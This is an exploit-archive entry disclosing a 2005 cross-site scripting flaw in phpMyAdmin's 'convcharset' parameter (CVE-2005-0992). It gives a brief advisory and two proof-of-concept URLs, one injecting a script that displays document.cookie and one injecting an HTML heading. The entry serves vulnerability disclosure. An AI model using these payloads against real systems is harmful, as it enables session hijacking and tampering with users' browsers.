phpMyAdmin 2.x - Convcharset Cross-Site Scripting

Author: Oriol Torrent Santiago
type: webapps
platform: php
port: 
date_added: 2005-04-03 
date_updated: 2013-05-10 
verified: 1 
codes: CVE-2005-0992;OSVDB-15226 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/12982/info

phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the 'convcharset' parameter.

phpMyAdmin versions prior to 2.6.2-rc1 are affected by this issue.

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>